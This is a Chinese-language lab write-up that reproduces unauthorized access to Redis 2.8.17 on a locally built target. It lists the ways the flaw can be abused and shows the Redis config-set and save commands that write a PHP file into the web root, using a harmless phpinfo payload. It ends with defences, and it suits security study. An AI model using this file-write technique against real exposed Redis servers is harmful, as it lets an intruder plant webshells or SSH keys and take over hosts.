测试版本:2.8.17
漏洞简介以及危害
Redis 默认情况下,会绑定在 0.0.0.0:6379,如果没有进行采用相关的策略,比如添加防火墙规则避免其他非信任来源 ip 访问等,这样将会将 Redis 服务暴露到公网上,如果在没有设置密码认证(一般为空)的情况下,会导致任意用户在可以访问目标服务器的情况下未授权访问 Redis 以及读取 Redis 的数据。攻击者在未授权访问 Redis 的情况下,利用 Redis 自身的提供的config 命令,可以进行写文件操作
漏洞产生的条件有以下两点:
1.redis绑定在0.0.0.0:6379,并且没有添加防火墙规则避免其他非信任来源ip访问等相关的安全策略,直接暴露在公网上
2.没有设置密码认证(一般为空),可以免密远程登陆redis服务
危害:
(1)攻击者无需认证访问到内部数据,可能导致敏感信息泄露,黑客也可以恶意执行flushall来清空所有数据;
(2)攻击者可通过EVAL执行lua代码,或通过数据备份功能往磁盘写入后门文件;
(3)最严重的情况,如果Redis以root身份运行,黑客可以给root账户写入SSH公钥文件,直接通过SSH登录受害服务器
复现过程:
wget http://download.redis.io/releases/redis-2.8.17.tar.gz
tar xzvf redis-2.8.17.tar.gz #解压安装包
cd redis-2.8.17 # 进入redis目录
make #编译
cd src/ #进入src目录
cp redis-server /usr/bin/
cp redis-cli /usr/bin/ #将redis-server和redis-cli拷贝到/usr/bin目录下(这样启动redis-server和redis-cli就不用每次都进入安装目录了)
cd .. # 返回上一级目录
cp redis.conf /etc/ #将redis.conf拷贝到/etc/目录下
redis-server /etc/redis.conf # 使用/etc/目录下的redis.conf文件中的配置启动redis服务
服务启动成功!
服务启动成功
为了方便,在windows攻击机里下载一个redis clinet
下载地址:https://github.com/caoxinyu/RedisClient/releases (利用redis写webshell测试使用)
未授权访问测试
使用redis clinet 直接无账号成功登录redis
从登录结果可以看出redis未启用认证。
利用redis写webshell
利用前提:
靶机redis未授权,在攻击机能用redis clinet连接,如上图,并未登录验证
靶机开启web服务,并且知道网站路径,还需要具有文件读写增删改查权限
靶机网站路径:/var/www/html/
这里我们调出Console
由于本地搭建,我们已经知道网站路径,我们把shell写入/var/www/html/目录下:
config set dir /var/www/html
config set dbfilename test.php
config set webshell "<?php phpinfo(); ?>"
save
再去靶机wei目录下查看test.php,写入成功:
防御手段:
-禁止使用root权限启动redis服务。
-对redis访问启动密码认证。
-添加IP访问限制,并更改默认6379端口